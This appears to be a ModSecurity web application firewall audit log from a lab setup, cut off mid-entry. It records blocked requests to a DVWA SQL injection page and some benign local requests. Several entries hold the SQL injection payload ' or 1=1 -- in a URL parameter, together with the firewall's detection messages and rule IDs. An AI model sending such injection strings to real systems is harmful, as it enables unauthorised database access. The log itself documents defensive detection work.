{"transaction":{"time":"13/May/2017:12:31:57 --0400","transaction_id":"WRc0-X8AAQEAAAkZ0BkAAAAE","remote_address":"192.168.75.145","remote_port":56792,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=94","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0-X8AAQEAAAkZ0BkAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0-X8AAQEAAAkZ0BkAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0-X8AAQEAAAkZ0BkAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0-X8AAQEAAAkZ0BkAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0-X8AAQEAAAkZ0BkAAAAE\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":388,"p2":2109,"p3":0,"p4":0,"p5":143,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:32:05 --0400","transaction_id":"WRc1BX8AAQEAAAkVV4wAAAAA","remote_address":"192.168.75.145","remote_port":56806,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1BX8AAQEAAAkVV4wAAAAA\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1BX8AAQEAAAkVV4wAAAAA\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1BX8AAQEAAAkVV4wAAAAA\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1BX8AAQEAAAkVV4wAAAAA\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1BX8AAQEAAAkVV4wAAAAA\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":661,"p2":3257,"p3":0,"p4":0,"p5":217,"sr":26,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:32:25 --0400","transaction_id":"WRc1GX8AAQEAAAmHBJcAAAAF","remote_address":"127.0.0.1","remote_port":42084,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:30:21 GMT","If-None-Match":"\"1d0-54f6a5695262a\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:32:22 GMT","ETag":"\"1f8-54f6a5dd13646\"","Accept-Ranges":"bytes","Content-Length":"504","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc1GX8AAQEAAAmHBJcAAAAF\"]"],"stopwatch":{"p1":652,"p2":1048,"p3":56,"p4":246,"p5":52,"sr":29,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:32:25 --0400","transaction_id":"WRc1GX8AAQEAAAmHBJgAAAAF","remote_address":"127.0.0.1","remote_port":42084,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc1GX8AAQEAAAmHBJgAAAAF\"]"],"stopwatch":{"p1":382,"p2":921,"p3":46,"p4":245,"p5":48,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:32:25 --0400","transaction_id":"WRc1GX8AAQEAAAmHBJkAAAAF","remote_address":"127.0.0.1","remote_port":42084,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc1GX8AAQEAAAmHBJkAAAAF\"]"],"stopwatch":{"p1":548,"p2":856,"p3":42,"p4":234,"p5":44,"sr":27,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:34:29 --0400","transaction_id":"WRc1lX8AAQEAAAkXs@gAAAAC","remote_address":"192.168.75.153","remote_port":39270,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"2701","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg 